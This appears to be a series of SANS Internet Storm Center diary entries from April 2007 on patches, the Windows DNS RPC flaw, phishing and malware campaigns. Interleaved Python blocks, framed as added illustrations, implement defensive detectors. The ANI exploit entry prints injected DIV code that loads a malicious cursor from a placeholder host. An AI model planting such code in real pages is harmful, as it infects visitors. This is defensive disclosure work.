Apple Computer released an update which addresses a number of security issues in the Mac OS X and OS X Server systems.  This announcement is available at Security Update 2007-004.  There are about 25 separate vulnerabilities addressed, which range from remote attackers causing denial of service all the way to local users gaining some form of privilege escalation.  Most of these updates are quite serious and should be reviewed and applied appropriately as allowed by your local patch testing and management policies.

The updates can be applied via the Software Update icon in the apple menu, or downloading and installing the appropriate update available from Apple Support Downloads site.

Scott Fendley
ISC Handler


Published: 2007-04-19

We need your help: VA Tech Domains

Even faster than for Hurricane Katrina, new domains are being registered for the VA Tech shootings. Some of them are used for benevolent purposes. However, a good share of them are parked for auction and even used for fraudulent donations.

We set up a page with about 450 different domain names that look suspect. If you have a few minutes, help us categorize the domains. You need to log in (so we can prevent bad input).

For details, see http://isc.sans.org/domaincheck.html .


Published: 2007-04-18

Thunderbird released

Mozilla announced the release of Thunderbird for download. Thunderbird is the free open-source email application.

As well, Firefox 1.5. will be supported until April 24, 2007 with security and stability updates.  Time to upgrade.

Thanks to Paul and Kevin for writing in.



Published: 2007-04-18

Oracle CPU

Yesterday Oracle released their Critical Patch update for April.

Adrien de Beaupre


Published: 2007-04-18

Blackberry Outage

In case you wonder why things are so quiet today: Looks like Blackberry service is out for all/most of North America. The outage started at about 8pm EDT/5pm PDT on Tuesday.

and just as I posted this (8am EDT), my own T-Mobile Blackberry started to wake up and deliver email again.


RIM have acknowledged the incident, things appear operational now. Some mail delayed earlier may still be arriving now.


Published: 2007-04-17

Phishers taking advantage of Virginia Tech tragedy

There has been a flurry of domain registrations related to the Virginia Tech tragedy, as reported by GoDaddy and other registrars. While some of these are undoubtedly well-intentioned organizations joining in the outpouring of support for the friends and family of the victims, others are likely to be opportunists who want to cash in on the suffering of others.

Be on the lookout for a rash of spam & phishing coming from these leeches. If you receive a plea for donations, check the organization out closely before opening up your e-gold, Paypal, Visa or other account or providing any personal information. In some cases the phishers may use voice, fax, email and websites to dupe generous and thoughtful victims into disclosing valuable information.

With any luck, these have been scooped up by cybersquatters (http://www.sans.org/newsletters/newsbites/newsbites.php?vol=9&issue=22#sID301) who will be left holding the bag when nobody is heartless enough to use the domains for unscrupulous purposes. A number of the following domains have been checked and, as of yet, contain no content:


Here is a blog listing the above godaddy sites, and linking to other related blogs:


Please, if you believe that you have received a phishing email, submit it to the Anti-Phishing Working Group (APWG) - http://antiphishing.com/report_phishing.html


Published: 2007-04-17

New variant of ANI (MS07-017) exploit

What a shocker - malware authors are playing cat 'n' mouse with antivirus signatures.

Roger Chiu of Malware-Test Lab submitted a .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:

<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>

This latest variant was submitted to the A/V community for inclusion and the site owners contacted.
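The two DIV lines above are the delivery pattern: a CSS cursor property whose URL points at something that is not a cursor file at all. As an added illustration (not code from the diary or from Malware-Test Lab), the following Python scans HTML for `cursor: url(...)` declarations and flags targets whose extension is not `.cur` or `.ani`. The regex, function names and the sample document are my own; the sample reuses the diary's two placeholder lines plus one legitimate cursor reference for contrast.

```python
import re

# Matches CSS "cursor: url(<target>)" in inline styles or style sheets,
# tolerating optional quotes and whitespace. Assumption: targets do not
# themselves contain ')' or quote characters.
CURSOR_URL_RE = re.compile(
    r"cursor\s*:\s*url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)", re.IGNORECASE)

# Extensions a legitimate CSS cursor would normally reference.
CURSOR_EXTENSIONS = (".cur", ".ani")


def find_cursor_urls(html: str):
    """Return every URL referenced by a CSS cursor property in the document."""
    return CURSOR_URL_RE.findall(html)


def suspicious_cursor_urls(html: str):
    """Return cursor URLs whose target does not look like a cursor file.

    This is a triage heuristic: a malicious .ani can be served under any
    name, so a cursor that points at 'css.js' (as in the diary) is the
    thing to pull out of a page for closer inspection."""
    flagged = []
    for url in find_cursor_urls(html):
        # strip query string and fragment before looking at the extension
        path = url.split("?", 1)[0].split("#", 1)[0].lower()
        if not path.endswith(CURSOR_EXTENSIONS):
            flagged.append(url)
    return flagged


# Constructed sample built from the two lines quoted in the diary (hxxp and
# xxx.xxx.xxx placeholders kept as they appear there) plus one benign cursor.
SAMPLE_HTML = """
<html><body>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>
<div style="cursor: url('/img/hand.cur'), pointer">legitimate</div>
</body></html>
"""

if __name__ == "__main__":
    for target in suspicious_cursor_urls(SAMPLE_HTML):
        print("suspicious cursor target:", target)
```

Run over a proxy's saved HTML, this pulls out exactly the two placeholder targets and ignores the `.cur` reference; the page that serves the flagged file is then the one to submit to the AV vendors or block.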

Thanks, Roger.


Published: 2007-04-17

New DShield Feature: Highly Predictive Blocklists.

I am happy to announce an exciting new feature to DShield submitters. Based on some research done by SRI International, we came up with an algorithm to create better blocklists.

The short one paragraph summary: The algorithm compares your submissions to others and finds groups of similar submitters. Next, it will generate blocklists based on how close you are to these other submitters.

In other simulations, these blocklists have been far superior to regular "global worst offender" or "local worst offender" lists.

For details, see http://www.dshield.org/hpbinfo.html
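To make the two-sentence summary concrete, here is an added toy model of the idea (my own illustration, not the SRI algorithm or DShield's code): each submitter contributes the set of source addresses it logged, submitters are compared by Jaccard overlap, and an attacker address is scored by the summed similarity of the submitters that reported it. The sample data, names and the scoring rule are assumptions chosen to show how such a list diverges from a plain "global worst offender" count.

```python
from collections import defaultdict

# Constructed sample: for each submitter, the set of source IPs its firewall
# logged in the last period. Documentation-range addresses, not real IoCs.
REPORTS = {
    "me":    {"192.0.2.10", "192.0.2.11", "198.51.100.5"},
    "peer1": {"192.0.2.10", "192.0.2.11", "198.51.100.6"},
    "peer2": {"192.0.2.10", "203.0.113.40", "198.51.100.6"},
    "far":   {"203.0.113.1", "203.0.113.2", "203.0.113.3"},
}


def jaccard(a, b):
    """Overlap of two attacker sets: 0.0 (disjoint) to 1.0 (identical)."""
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


def similarity_to(me, reports):
    """Similarity of every other submitter to 'me'."""
    return {who: jaccard(reports[me], ips)
            for who, ips in reports.items() if who != me}


def predictive_blocklist(me, reports, min_score=0.0, limit=10):
    """Score each attacker IP by the summed similarity of the submitters
    that saw it (excluding 'me'), so addresses seen by submitters whose
    traffic resembles mine outrank addresses seen only by unrelated sites."""
    sims = similarity_to(me, reports)
    score = defaultdict(float)
    for who, sim in sims.items():
        for ip in reports[who]:
            score[ip] += sim
    ranked = sorted(score.items(), key=lambda kv: (-kv[1], kv[0]))
    return [ip for ip, s in ranked if s > min_score][:limit]


def global_worst_offenders(reports, limit=10):
    """Baseline for comparison: rank by how many submitters saw each IP."""
    count = defaultdict(int)
    for ips in reports.values():
        for ip in ips:
            count[ip] += 1
    ranked = sorted(count.items(), key=lambda kv: (-kv[1], kv[0]))
    return [ip for ip, _ in ranked[:limit]]


if __name__ == "__main__":
    print("similarity:", similarity_to("me", REPORTS))
    print("predictive:", predictive_blocklist("me", REPORTS))
    print("global:    ", global_worst_offenders(REPORTS))
```

With this data, "203.0.113.40" makes the predictive list because the submitter that saw it overlaps with "me", while the three addresses reported only by the unrelated submitter "far" are left out entirely; the global count would rank all of them equally.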


Published: 2007-04-16

New Rinbot scanning for port 1025 DNS/RPC

We are currently tracking a new version of the Rinbot worm that in addition to its regular scans, is also scanning for port 1025/tcp. Once connected, it attempts to do a Windows 2000 DnsservQuery, likely to exploit the recent Microsoft DNS vulnerability. Detection of this virus is currently very poor, and we are working with the AV vendors to improve this.

In the meantime, we would like to urge you to consider implementing the workarounds discussed in our previous diary entry here.


Published: 2007-04-16

New ClamAV version fixes buffer overflow vulnerability

If you're running a version of ClamAV 0.90, now is the time to upgrade to version 0.90.2, released last Friday. This version contains a fix for a buffer overflow vulnerability, CVE-2007-1997, identified by iDefense. An attacker can convince a user (or mail gateway) to scan a maliciously crafted CAB file that could lead to arbitrary code execution under the user account running the scanner. 

As a temporary workaround, you could drop CAB files prior to executing the scanner. This is particularly relevant for e-mail gateways, which generally only need to allow a limited set of file types. The CAB format is an archive often used by Microsoft for software distribution, so on a web proxy this may be problematic.
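A gateway that drops CAB files by extension alone misses a cabinet renamed to `.doc`, so the check worth having looks at the content. The following Python is an added example (not ClamAV code and not from the diary) of a pre-scan filter that drops an attachment when either its name carries a blocked extension or its first four bytes are the `MSCF` cabinet signature; the function names and sample attachments are constructed for the illustration.

```python
# Microsoft Cabinet files start with the ASCII signature "MSCF" at offset 0.
CAB_MAGIC = b"MSCF"


def is_cab(data: bytes) -> bool:
    """True if the payload carries the cabinet signature, whatever its name."""
    return data[:4] == CAB_MAGIC


def filter_attachments(attachments, drop_extensions=(".cab",)):
    """Split attachments into (names_to_scan, dropped).

    Each attachment is a (name, bytes) pair. An attachment is dropped when its
    name ends in a blocked extension or, failing that, when its content starts
    with the CAB signature; the reason is recorded so the gateway can log it."""
    to_scan, dropped = [], []
    for name, data in attachments:
        if name.lower().endswith(drop_extensions):
            dropped.append((name, "extension"))
        elif is_cab(data):
            dropped.append((name, "MSCF header"))
        else:
            to_scan.append(name)
    return to_scan, dropped


# Constructed samples: the CAB bodies are header stubs, not real archives.
SAMPLE_ATTACHMENTS = [
    ("report.pdf", b"%PDF-1.4 ..."),
    ("setup.cab", b"MSCF" + b"\x00" * 32),
    ("invoice.doc", b"MSCF" + b"\x00" * 32),   # a cabinet renamed to .doc
    ("notes.txt", b"plain text"),
]

if __name__ == "__main__":
    scan, drop = filter_attachments(SAMPLE_ATTACHMENTS)
    print("pass to scanner:", scan)
    print("dropped:        ", drop)
```

The header check only covers a cabinet that arrives as a top-level attachment; one nested inside another archive or a self-extracting executable is not seen by this filter, which is another reason the editorial further down argues for blocking executables outright.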


Published: 2007-04-16

Malware distributed through German-language spam mail

Eric wrote in with a new malicious message that is making the rounds in Europe. It's written in German, and contains a link to a Geocities account with an invisible iframe link. The content of one of the e-mails is below:

"Berlin subway (U-Bahn) workers found the remains of an unknown flying object. The investigation into possible reasons for the malaise of some subway employees is also interesting. After numerous inspections a foreign body was found. As scientists claim, the body could be as big as a bus. It was also suspected that it could have emitted strange rays, because of a "dead zone" formed around the hull. More on this at http://geocities.com/[filtered]"

Very interesting story about an unidentified flying object and body found in the Berlin underground. The Geocities URL mentioned is different in every single mail, and points to an index.html which contains a hidden iframe pointing to a server in Hong Kong. While this host has likely been victimized, you may wish to temporarily block it on your web proxy.

That server is hosting a file update.exe which has spotty AV coverage at this time:

AntiVir 04.16.2007 HEUR/Malware
F-Secure 6.70.13030.0 04.16.2007 W32/Malware
Ikarus T3.1.1.5 04.16.2007 Trojan-Spy.Win32.Goldun.lw
Norman 5.80.02 04.14.2007 W32/Malware
Sophos 4.16.0 04.12.2007 Mal/Binder-C
VBA32 3.11.3 04.14.2007 MalwareScope.Trojan-Spy.BZub.1
Webwasher-Gateway 6.0.1 04.16.2007 Heuristic.Malware

Maarten Van Horenbeeck


Published: 2007-04-16

Update on Microsoft DNS vulnerability

We received a couple of e-mails over the weekend asking us why this vulnerability was significant. Most public DNS servers should not be listening on the RPC ports, after all. Indeed, networks that follow basic secure perimeter design would only allow port 53 UDP/TCP to the authoritative DNS servers, and definitely not the additional RPC ports required for exploitation.

However, there are at least two design scenarios that could prove an issue:

- The many Windows servers in use at dedicated hosters. In a large number of cases, these will be single box, do-it-all type hosting machines on the Windows 2003 Web Edition platform. They would be running FTP, HTTP and DNS services, but are usually not shielded by a separate firewall.
- Active directory servers hosted on the internal network are often combined with DNS functionality. These machines are usually less protected than DMZ DNS servers, and other functionality provisioned may require the RPC ports to be available (e.g. some authentication services). If your active directory server is compromised, the game is essentially over.

Also a small update on the Microsoft advisory:
- CVE-2007-1748 is now used to track the vulnerability;
- Microsoft added to their advisory that DNS server local administration and configuration may not work if the computer name is 15 characters or longer. They suggest using the FQDN (Fully Qualified Domain Name) of the host to ensure this works correctly.

Maarten Van Horenbeeck


Published: 2007-04-15

Gaming Malware

A reader alerted us to new malware aimed at online gamers.  Over at Teamspeak (providers of a very popular voice communications program used by gamers) some users signed up for their discussion forums received an email like this:
-----Original Message-----
From: nospam@goteamspeak.com
Sent: Saturday, April 14, 2007 8:49 PM
To: <deleted>
Subject: New Team Speak Patch [Link Inside]

Now you can download new Team Speak patch. It will help you to use our
Team Speak servers.
We advise you to download it now

Many of our seasoned readers know where this is going.  Unfortunately many gamers are not as aware of computer-based social engineering tricks and very likely downloaded "patch.exe" without a second thought.  We downloaded the malware (it is no longer available, so happy hunting if you are looking for a sample) and ran it through VirusTotal.  The results were not encouraging.  The only hits we received were:

Antivirus        Version          Update      Result
CAT-QuickHeal    9.00             04.14.2007  (Suspicious) - DNAScan
ClamAV           devel-20070312   04.15.2007  Trojan.Spy-4392
Fortinet                          04.15.2007  W32/LdPinch.BEO!tr.pws
Ikarus           T3.1.1.5         04.15.2007  Trojan-PWS.LDPinch.1607
Kaspersky                         04.15.2007  Trojan-PSW.Win32.LdPinch.beo
Panda                             04.15.2007  Suspicious file
Webwasher-Gtwy   6.0.1            04.14.2007  Win32.Malware.gen (suspicious)

Additional Information
File size: 48640 bytes
MD5: 488b22114f1a08dc68a7e2cc34bf1d01
SHA1: 3da87252c917493e591c6ea222637910fff07a5e

There was some discussion a few hours ago in the TeamSpeak forums, but currently the forums appear to be offline.  We'll keep monitoring this and will post any updates if needed.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-04-13

More info on the Windows DNS RPC interface vulnerability

Some more information for the community regarding the Windows DNS RPC vulnerability that we have been reporting on http://isc.sans.org/diary.html?storyid=2627. We have knowledge of a successful attack that occurred on April 4, 2007. This appears to be an opportunistic attack (instead of a targeted attack).

So it's likely that others have been compromised as well. If you have a vulnerable MS DNS server (Win2K SP4 or Win2003 SP1 or SP2) accessible to the Internet and don't have ports above 1024 blocked, then you may have already been targeted in an attack.

At this point, there seems to be a very small number of known compromises. We are interested in whether other sites have seen it. Has your IDS been alerting on shellcode for DCOM signatures where the port is above 1024? Have you seen portscans above 1024? Has your DNS.exe service died recently? (Apparently the service does not restart by itself.) If so, then let us know. And as always, if you have any packet captures of this activity, please send them in.

Update: If you have a large number of domain controllers and want to automate the disabling of RPC, check out this blog entry: http://msinfluentials.com/blogs/jesper/archive/2007/04/13/turn-off-rpc-management-of-dns-on-all-dcs.aspx


Published: 2007-04-13

Microsoft Vulnerability in RPC on Windows DNS Server

As a follow-up to our diary earlier this week about a potential new DNS vulnerability, Microsoft has released an advisory in regard to the vulnerability.  Microsoft has investigated and it appears a vulnerability exists that could allow an attacker to run code under the Domain Name System Server service.  This service by default runs as the local SYSTEM account.

Microsoft has a few suggested actions that can mitigate the risk.

  1. Disable remote management over RPC for the DNS server via a registry key setting.
  2. Block unsolicited inbound traffic on ports 1024-5000 using  IPsec or other firewall.
  3. Enable the advanced TCP/IP Filtering options on the appropriate interfaces of the server.

For more information, please see KB 935964 (Vulnerability in RPC on Windows DNS Server Could Allow Remote Code Execution).
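The second mitigation (block unsolicited inbound traffic to ports 1024-5000) also gives you something to hunt for in existing firewall logs, which is the question the "More info" entry above asks: who has been reaching the RPC range on your DNS servers, and who has been sweeping the high ports? The following Python is an added example (not from the diary or from Microsoft) that triages constructed firewall log lines for both patterns. The log format, the `DNS_SERVERS` set, the internal address prefixes and all addresses are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Assumed environment: one Windows DNS server, two internal prefixes.
DNS_SERVERS = {"192.0.2.53"}
INTERNAL_PREFIXES = ("192.0.2.", "10.")
# The dynamic RPC range named in the mitigation above.
RPC_PORT_RANGE = range(1024, 5001)

# Assumed log format: "<date> <time> <ALLOW|DROP> <TCP|UDP> <src> <dst> <sport> <dport>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<action>ALLOW|DROP) (?P<proto>TCP|UDP) "
    r"(?P<src>\S+) (?P<dst>\S+) (?P<sport>\d+) (?P<dport>\d+)$")


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIXES)


def rpc_hits(lines):
    """External sources that were ALLOWED to reach the RPC range on a DNS
    server over TCP, with the distinct destination ports each touched."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["proto"] != "TCP" or rec["action"] != "ALLOW":
            continue
        if (rec["dst"] in DNS_SERVERS and rec["dport"] in RPC_PORT_RANGE
                and not is_internal(rec["src"])):
            hits[rec["src"]].add(rec["dport"])
    return {src: sorted(ports) for src, ports in hits.items()}


def high_port_scanners(lines, threshold=5):
    """External sources that probed at least `threshold` distinct ports above
    1024 on a DNS server; DROPped packets count, since a drop is still a probe."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["dst"] in DNS_SERVERS and rec["dport"] > 1024
                and not is_internal(rec["src"])):
            seen[rec["src"]].add(rec["dport"])
    return sorted(src for src, ports in seen.items() if len(ports) >= threshold)


# Constructed log excerpt: normal DNS and web traffic, one internal admin
# connection, and one external host walking ports 1025-1030.
SAMPLE_LOG = """\
2007-04-13 09:58:01 ALLOW UDP 198.51.100.20 192.0.2.53 53412 53
2007-04-13 09:58:02 ALLOW TCP 10.0.0.7 192.0.2.53 49210 1025
2007-04-13 09:58:05 ALLOW TCP 203.0.113.9 192.0.2.53 3212 1025
2007-04-13 09:58:06 DROP TCP 203.0.113.9 192.0.2.53 3213 1026
2007-04-13 09:58:06 DROP TCP 203.0.113.9 192.0.2.53 3214 1027
2007-04-13 09:58:07 DROP TCP 203.0.113.9 192.0.2.53 3215 1028
2007-04-13 09:58:07 DROP TCP 203.0.113.9 192.0.2.53 3216 1029
2007-04-13 09:58:08 ALLOW TCP 203.0.113.9 192.0.2.53 3217 1030
2007-04-13 09:58:09 ALLOW TCP 198.51.100.20 192.0.2.53 40001 80
""".splitlines()

if __name__ == "__main__":
    print("RPC-range hits:", rpc_hits(SAMPLE_LOG))
    print("high-port scanners:", high_port_scanners(SAMPLE_LOG))
```

The internal host on port 1025 is left out on purpose: local administration over RPC is what the first mitigation disables, and an internal source on that port is a different question from an Internet host reaching it.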

Scott Fendley
ISC Handler


Published: 2007-04-12

Svchost, Microsoft Updates, and 99% CPU Usage

We received a couple emails today talking about the latest Microsoft Updates and the svchost service taking up 99% of CPU Utilization after applying them.

Is this isolated to a couple people, or is this more widespread?  Then, if it is widespread, and you fixed it, how did you do it?  Share your insight!

(Thank you Noah, and other readers who wished not to be named for your submission!)

(Not being a Microsoft guy myself....)

Joel Esler
Handler o' the Day


Published: 2007-04-12

Cisco wireless equipment vulnerabilities

Cisco released an advisory regarding three weaknesses in the Cisco Wireless Control System. This is Cisco’s central platform for the management of their WLAN equipment.

  • WCS apparently uses fixed and unchangeable authentication credentials on the FTP service used by the Wireless Location Appliances for backup purposes. Fixed in WCS This is regular FTP, so these passwords can be sniffed off the network and re-used by an attacker.
  • WCS suffers from a privilege escalation vulnerability that allows valid users to access information from any WCS configuration page (fixed in or to become a member of the SuperUsers group (fixed in
  • Certain WCS directories are not password protected. This may lead to disclosure of private information such as access point location. Fixed in
They also released a second advisory on vulnerabilities in the Cisco Wireless LAN controller and their Lightweight Access Points. A number of fixed versions are pending release, so check the advisory for up-to-date information.

Applicable to the WLC are:
  • Use of default community strings (public/private);
  • The device may be crashed by sending malformed ethernet traffic;
  • Some or all of the Network Processing Units within the WLC may be locked up by sending malformed traffic, including some SNAP packets, malformed 802.11 traffic or packets with unexpected length values in headers;
  • WLAN ACLs could in some cases not survive a reboot.

The Cisco Aironet 1000 and 1500 lightweight access points are reported to contain a hard-coded service password. This is only available over a physical console connection, though.

Maarten Van Horenbeeck


Published: 2007-04-12

EXE/ZIP e-mail viruses (editorial)

A quick (technical) update to this otherwise more "philosophical" diary: It's not that hard to figure out if the content of an encrypted ZIP file is a .exe file. The file names are not encrypted! So just run:

$ unzip -l patch-58214.zip
Archive:  patch-58214.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
    40649  04-12-07 18:21   patch-58214.exe
 --------                   -------
    40649                   1 file
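The same check in code, for a mail gateway that wants to reject a password-protected archive by what it contains rather than by its subject line. This is an added example, not part of the diary: it builds a constructed sample archive with one entry, sets the "encrypted" flag bit so the archive presents itself as password protected (the payload is zero-filled filler, not malware), then lists the names from the central directory without any password, exactly as `unzip -l` does. The entry name and size echo the listing above; the helper names are my own.

```python
import io
import struct
import zipfile

# Extensions a mail gateway would treat as executable content.
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def build_sample_zip(name="patch-58214.exe", size=40649):
    """Constructed sample: one-entry ZIP with the encryption bit switched on
    afterwards. Bit 0 of the general-purpose flags marks an entry as
    encrypted; it lives at offset 6 of the local header and offset 8 of the
    central-directory header. The entry data is filler, not a real program."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, b"\x00" * size)
    data = bytearray(buf.getvalue())
    # Locate the central directory via the end-of-central-directory record
    # (offset 16 holds the CD start), then the local header via the CD entry
    # (offset 42 holds the local header offset).
    eocd = data.rfind(b"PK\x05\x06")
    cd = struct.unpack_from("<I", data, eocd + 16)[0]
    lh = struct.unpack_from("<I", data, cd + 42)[0]
    data[cd + 8] |= 0x01
    data[lh + 6] |= 0x01
    return bytes(data)


def list_zip(data):
    """Equivalent of `unzip -l`: (name, uncompressed size, encrypted?) for
    every entry, read from the central directory, which is never encrypted."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(zi.filename, zi.file_size, bool(zi.flag_bits & 0x01))
                for zi in zf.infolist()]


def executables_in_zip(data):
    """Entry names with an executable extension; no password required."""
    return [name for name, _, _ in list_zip(data)
            if name.lower().endswith(EXEC_EXTENSIONS)]


if __name__ == "__main__":
    sample = build_sample_zip()
    for name, size, encrypted in list_zip(sample):
        print(f"{size:>8}  {'encrypted' if encrypted else 'plain':9}  {name}")
    print("executables:", executables_in_zip(sample))
```

Reading the entry's content would fail without the password, but `executables_in_zip` never tries to; the file name in the directory is enough to make the blocking decision.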

anyway back to the editorial ;-)...

I label this diary "Editorial", as I would like to go beyond the plain facts of the recent set of "Storm"/"nuwar"/"zhelatin" viruses.

Remember Bagle? It was just a couple of years ago when a very similar set of viruses was making the rounds. Bagle arrived as a plain .exe, waiting for a gullible user to double click and execute it. Later, very much like the new "Storm" virus, it used an encrypted ZIP file.

Back with Bagle, we managed to get hold of some of the web logs from sites Bagle used to "call home". In analyzing these logs we found a large overlap in users infected by various Bagle variants. In short: The same users are getting infected over and over again by the "malware of the day".

I think these viruses offer a sad glimpse into the current state of Internet security. Not only have users still not learned to "never click on an executable". Neither have network administrators learned to filter executables. When was the last time you received a legitimate executable as an attachment? (NO! IE7.exe was not one of them!).

Lastly, "Storm" is yet another hint that current AV software is no longer an adequate means to protect yourself from current and relevant threats. Subscription-based business models direct mainstream consumer anti-virus systems into a dead end of signature updates, which haven't worked at least since Zotob showed up.

As a reader of this post, you are unlikely to be able to do anything about the current sad state of anti-virus. But you may be able to block .exe files on your mail server. Don't ask me for subject or file names. Block executables!


Published: 2007-04-12

whois.internic.net outage?

We are also receiving reports from users (and other handlers) not being able to reach whois.internic.net.  One of our handlers tells us that a traceroute to the host expires in the DC area in alter.net.

Joel Esler
Handler on Duty


Published: 2007-04-12

New Worm making the rounds?

We've received a bunch of emails in the past few minutes indicating the possible presence of a new Worm.

Apparently it indicates itself as a "Patch" for the "New worm" that is going around (whatever that may be, there are just so many I could choose from!)

The Subject of the email (that we have seen so far) says "Worm Alert!".

It has two attachments, one being an image with "panic-worded text", and the other a password-protected zip file, whose password is revealed in the image.

Clamav will not pick up the zip file, but it will pick up the .exe inside of it, and apparently names it "Trojan.Small-1641"  (That's so descriptive!)

Joel Esler
Handler of the Day


Published: 2007-04-12

Oracle Critical Patch Update Pre-Release Announcement

This was also a notification from one of our readers (thanks Juha-Matti!), as well as all the email blasts we received this morning from the big Oracle in the sky.  Oracle has released their announcements for April.


"This Critical Patch Update contains 37 security fixes across all products."

So, if you are running Oracle, it's that time of the month again!

Joel Esler
Handler of the Day


Published: 2007-04-12

Opera 9.20

Thanks to a couple readers that wrote in this morning, we were notified about Opera 9.20 for all platforms.

A cut and paste of the "Security" section says:


  • Fix for character encoding inheritance issue with frames, which could enable cross-site scripting. See the advisory.
  • Fixed an issue regarding handling of FTP PASV response, as reported by Mark at bindshell.net
  • XMLHttpRequest now treats separate ports on the same server as a different server. Issue reported by Egmont Koblinger.
  • Fixed an issue where scripts could continue to run after leaving the page, as reported by Herrmann Manuel.
  • Skandiabanken.no's message about successful certificate installation is now shown.
So, if you are out there running Opera.  Time to upgrade!  /me goes off to upgrade my own.

Joel Esler
Handler of the Day


Published: 2007-04-10


AOL's IM clients are getting attention from security researchers: following ".." when saving a received file and/or not displaying the same filename as the one actually used.
  • ICQ: should have updated itself by now; if not, make sure it did.
  • AIM: make sure to upgrade to the latest and greatest.

Several readers reported that Sun Java 6 update 1 is being released through automatic updates.

Swa Frantzen -- NET2S


Published: 2007-04-10

Microsoft black Tuesday patches - April 2007

Overview of the April 2007 Microsoft patches and their status.

Note there was an out of cycle patch for the ANI vulnerability that we reported on earlier and that same patch is included here once again for completeness.

Columns of the original table: # | Affected | Contra indications | Known exploits | Microsoft rating | ISC rating(*) clients | ISC rating(*) servers

out of cycle
  Affected: Windows GDI. Multiple vulnerabilities, leading to privilege escalation, DoS and remote code execution. Replaces MS06-001 and MS05-053 and MS05-002 on Windows 2003. KB 925902
  Contra indications: Realtek HD audio control panel
  Known exploits: Actively exploited. SA 935423
  Microsoft rating: Critical
  ISC rating(*): clients PATCH NOW, servers Important

MS07-018
  Affected: MCMS (Microsoft Content Management Server). Remote code execution and XSS scripting. KB 925939
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating(*): clients Important, servers Critical

MS07-019
  Affected: UPnP (Universal Plug and Play). Memory corruption leading to remote code execution. KB 931261
  Known exploits: PoC available in for-pay program
  Microsoft rating: Critical
  ISC rating(*): clients Critical, servers Critical(**)

MS07-020
  Affected: Microsoft Agent. URL parsing error leads to remote code execution. KB 932168
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating(*): clients Critical, servers Important

MS07-021
  Affected: CSRSS (Windows Client/Server Run-time Subsystem). Multiple vulnerabilities leading to remote code execution, privilege escalation and DoS. KB 930178
  Known exploits: Known exploits since Dec 15th, 2006 (MSRC blog)
  Microsoft rating: Critical
  ISC rating(*): clients PATCH NOW, servers Critical

MS07-022
  Affected: Windows Kernel. Buffer overflow leading to privilege escalation. KB 931784
  Known exploits: Details discussed publicly
  Microsoft rating: Important
  ISC rating(*): clients Important, servers Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**)Further clarification from the more generic text above: Windows XP is used in a server role (like it or not), just as Windows 2003 server is used on laptops. The difference between client and server is not how the OS is marketed, not even what it is best suited for, but how its users are using it.

Swa Frantzen -- NET2S


Published: 2007-04-10

Pump and Dump reporting

Pump and Dump spams are part of a financial fraud scheme. Aside from the usual spam reporting, one can also report the practice to the appropriate official contacts.

Due to the global nature of this spam, one needs a list of which address to report to.

USA: SEC
  • SEC wants your stock related spam
  • Forward the spam to enforcement(AT)sec.gov
  • You get a standardized reply for every report, typically during the next business day
Germany: Bafin
  • poststelle-ffm(AT)bafin.de
Australia: ASIC (oversight) and ASX (stock exchange)
  • ASIC has a form, way too impractical for dealing with individual spam messages
  • info(AT)asx.com.au

If you have confirmed and working responsive addresses for other stock exchanges, please let us know.


Thanks to our readers Axel and more for reporting in on this.
Swa Frantzen -- NET2S


Published: 2007-04-09

Spam volume by category and year

Over the last few years I've done volunteer spam analysis for a number of groups.   As part of that work I've put together a report on individual spam categories at http://www.stearns.org/spamreport/spamreport.html .  It deliberately avoids conclusions, but provides the raw data for you to draw your own.  For example, the summary line near the end might answer the question, "Has the CAN-SPAM act - which went into effect January 1st, 2004 - measurably reduced the amount of spam we see in our inboxes?"
    -- William Stearns


Published: 2007-04-08

movie.exe spammed

